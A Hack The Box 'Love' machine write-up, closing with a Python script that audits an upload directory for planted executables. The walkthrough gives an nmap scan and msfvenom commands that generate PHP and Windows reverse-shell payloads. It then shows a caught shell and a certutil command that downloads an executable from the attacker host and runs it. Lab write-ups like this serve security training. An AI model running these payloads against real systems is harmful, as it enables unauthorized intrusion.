
LOVE_HTB

Published 2023/11/29

Machine

Scan

  • Command
    sudo nmap -Pn -sV -T4 10.10.10.239
  • Result
┌──(kali㉿kali)-[~]
└─$ sudo nmap -Pn -sV -T4 10.10.10.239        
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-28 07:11 EST
Nmap scan report for 10.10.10.239
Host is up (0.33s latency).
Not shown: 993 closed tcp ports (reset)
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp  open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open  mysql?
5000/tcp open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.93%I=7%D=11/28%Time=6565D8DC%P=x86_64-pc-linux-gnu%r(N
SF:ULL,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.16\.10'\x20is\x20not\x20allo
SF:wed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(GenericLine
SF:s,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.16\.10'\x20is\x20not\x20allowe
SF:d\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(GetRequest,4A
SF:,"F\0\0\x01\xffj\x04Host\x20'10\.10\.16\.10'\x20is\x20not\x20allowed\x2
SF:0to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(HTTPOptions,4A,"F
SF:\0\0\x01\xffj\x04Host\x20'10\.10\.16\.10'\x20is\x20not\x20allowed\x20to
SF:\x20connect\x20to\x20this\x20MariaDB\x20server")%r(RTSPRequest,4A,"F\0\
SF:0\x01\xffj\x04Host\x20'10\.10\.16\.10'\x20is\x20not\x20allowed\x20to\x2
SF:0connect\x20to\x20this\x20MariaDB\x20server")%r(RPCCheck,4A,"F\0\0\x01\
SF:xffj\x04Host\x20'10\.10\.16\.10'\x20is\x20not\x20allowed\x20to\x20conne
SF:ct\x20to\x20this\x20MariaDB\x20server")%r(DNSVersionBindReqTCP,4A,"F\0\
SF:0\x01\xffj\x04Host\x20'10\.10\.16\.10'\x20is\x20not\x20allowed\x20to\x2
SF:0connect\x20to\x20this\x20MariaDB\x20server")%r(Help,4A,"F\0\0\x01\xffj
SF:\x04Host\x20'10\.10\.16\.10'\x20is\x20not\x20allowed\x20to\x20connect\x
SF:20to\x20this\x20MariaDB\x20server")%r(TerminalServerCookie,4A,"F\0\0\x0
SF:1\xffj\x04Host\x20'10\.10\.16\.10'\x20is\x20not\x20allowed\x20to\x20con
SF:nect\x20to\x20this\x20MariaDB\x20server")%r(TLSSessionReq,4A,"F\0\0\x01
SF:\xffj\x04Host\x20'10\.10\.16\.10'\x20is\x20not\x20allowed\x20to\x20conn
SF:ect\x20to\x20this\x20MariaDB\x20server")%r(X11Probe,4A,"F\0\0\x01\xffj\
SF:x04Host\x20'10\.10\.16\.10'\x20is\x20not\x20allowed\x20to\x20connect\x2
SF:0to\x20this\x20MariaDB\x20server")%r(LPDString,4A,"F\0\0\x01\xffj\x04Ho
SF:st\x20'10\.10\.16\.10'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x
SF:20this\x20MariaDB\x20server")%r(LDAPSearchReq,4A,"F\0\0\x01\xffj\x04Hos
SF:t\x20'10\.10\.16\.10'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x2
SF:0this\x20MariaDB\x20server")%r(LDAPBindReq,4A,"F\0\0\x01\xffj\x04Host\x
SF:20'10\.10\.16\.10'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20th
SF:is\x20MariaDB\x20server")%r(SIPOptions,4A,"F\0\0\x01\xffj\x04Host\x20'1
SF:0\.10\.16\.10'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x
SF:20MariaDB\x20server");
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.34 second

Initial Access

  • hosts setup (the redirect must run with root privilege, and append rather than overwrite the file)
    echo "10.10.10.239 www.love.htb staging.love.htb" | sudo tee -a /etc/hosts

  • Web access (www.love.htb)

  • Web access (staging.love.htb)

  • Web access (staging.love.htb/beta.php)

  • Web access (www.love.htb/admin)

Make Shell

  • Ready

  • make reverse.php
    msfvenom -p php/reverse_php LHOST=<ip address> LPORT=<your port> -f raw > phpreverseshell.php

    • Result
      ┌──(kali㉿kali)-[~/love]
      └─$ msfvenom -p php/reverse_php LHOST=10.10.14.54 LPORT=135 -f raw >    phpreverseshell.php
      [-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
      [-] No arch selected, selecting arch: php from the payload
      No encoder specified, outputting raw payload
      Payload size: 3027 bytes
      
  • upload reverse.php

Revised as follows

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.54 LPORT=445 -f exe > revshell.exe

┌──(kali㉿kali)-[~/love]
└─$ nc -lnvp 4444    
listening on [any] 4444 ...
connect to [10.10.16.10] from (UNKNOWN) [10.10.10.239] 54044
whoami
love\phoebe
dir
 Volume in drive C has no label.
 Volume Serial Number is 56DE-BA30

 Directory of C:\xampp\htdocs\omrs\images

11/28/2023  06:53 AM    <DIR>          .
11/28/2023  06:53 AM    <DIR>          ..
05/18/2018  07:10 AM             4,240 facebook-profile-image.jpeg
04/12/2021  02:53 PM                 0 index.html.txt
01/26/2021  11:08 PM               844 index.jpeg
11/28/2023  06:53 AM             3,038 phpreverseshell.php
08/24/2017  03:00 AM            26,644 profile.jpg
11/28/2023  06:49 AM             7,168 revshell.exe
               6 File(s)         41,934 bytes
               2 Dir(s)   3,905,249,280 bytes free
certutil.exe -urlcache -split -f http://10.10.16.10/revshell.exe revshell.exe
****  Online  ****


CertUtil: -URLCache command FAILED: 0x80072efd (WinHttp: 12029 ERROR_WINHTTP_CANNOT_CONNECT)
CertUtil: A connection with the server could not be established
certutil.exe -urlcache -split -f http://10.10.16.10:8080/revshell.exe revshell.exe
****  Online  ****
  0000  ...
  1c00
CertUtil: -URLCache command completed successfully.
dir
 Volume in drive C has no label.
 Volume Serial Number is 56DE-BA30

 Directory of C:\xampp\htdocs\omrs\images

11/28/2023  06:53 AM    <DIR>          .
11/28/2023  06:53 AM    <DIR>          ..
05/18/2018  07:10 AM             4,240 facebook-profile-image.jpeg
04/12/2021  02:53 PM                 0 index.html.txt
01/26/2021  11:08 PM               844 index.jpeg
11/28/2023  06:53 AM             3,038 phpreverseshell.php
08/24/2017  03:00 AM            26,644 profile.jpg
11/28/2023  06:55 AM             7,168 revshell.exe
               6 File(s)         41,934 bytes
               2 Dir(s)   3,905,241,088 bytes free
.\revshell.exe
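From the defender's side, the directory listing above shows a PHP file and a PE executable sitting next to the real images in the web-served directory C:\xampp\htdocs\omrs\images, which is exactly what an integrity check on an upload directory should catch. As an added example (my own code, not part of the original writeup and not the application's), the Python below audits such a directory: it flags files whose content signature is an executable or PHP source, files whose extension is not an image type, and files whose extension does not match the image type of their content. The sample directory is constructed in a temporary folder with fake contents (the names mirror the listing, the bytes are placeholders); the function names are assumptions.

```python
import os
import shutil
import tempfile

# Content signatures for the image types an "images" directory is expected to hold.
IMAGE_MAGIC = {
    ".jpg":  (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png":  (b"\x89PNG\r\n\x1a\n",),
    ".gif":  (b"GIF87a", b"GIF89a"),
}

# Content signatures that have no business under a web-served image directory.
EXECUTABLE_MAGIC = {
    b"MZ": "PE executable",
    b"\x7fELF": "ELF executable",
    b"<?php": "PHP source",
}


def classify_file(name, head):
    """Return a finding for a suspicious file, or None if it looks like a plain image.

    `head` is the first bytes of the file; the content is checked before the
    extension so a renamed executable or script is still caught.
    """
    ext = os.path.splitext(name)[1].lower()
    for magic, label in EXECUTABLE_MAGIC.items():
        if head.startswith(magic):
            return f"{name}: content is {label}"
    if ext in IMAGE_MAGIC:
        if not any(head.startswith(m) for m in IMAGE_MAGIC[ext]):
            return f"{name}: extension {ext} but content is not a {ext} image"
        return None
    return f"{name}: unexpected extension {ext or '(none)'}"


def audit_upload_dir(path):
    """Walk one directory and collect findings for every file that is not a clean image."""
    findings = []
    for name in sorted(os.listdir(path)):
        full = os.path.join(path, name)
        if not os.path.isfile(full):
            continue
        with open(full, "rb") as f:
            head = f.read(16)
        finding = classify_file(name, head)
        if finding:
            findings.append(finding)
    return findings


def build_sample_dir():
    """Constructed sample: a temp directory with names taken from the listing above
    and placeholder contents (none of these files is real)."""
    d = tempfile.mkdtemp()
    samples = {
        "profile.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 12,          # real JPEG header
        "index.jpeg": b"\xff\xd8\xff\xe1" + b"\x00" * 12,           # real JPEG header
        "index.html.txt": b"",                                       # empty, non-image extension
        "phpreverseshell.php": b"<?php /* constructed placeholder, no code */",
        "revshell.exe": b"MZ" + b"\x00" * 14,                        # PE header only
        "logo.png.jpg": b"\x89PNG\r\n\x1a\n" + b"\x00" * 8,          # PNG bytes, .jpg name
    }
    for name, data in samples.items():
        with open(os.path.join(d, name), "wb") as f:
            f.write(data)
    return d


if __name__ == "__main__":
    sample = build_sample_dir()
    try:
        for line in audit_upload_dir(sample):
            print(line)
    finally:
        shutil.rmtree(sample)
```

Checking the content signature before the extension matters: the two files that matter in the listing are obvious by name, but the same check also catches an executable or script that was renamed to .jpg, and the extension-mismatch branch catches an image of one type stored under another type's extension, which is a common sign that an upload filter was only looking at the name.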
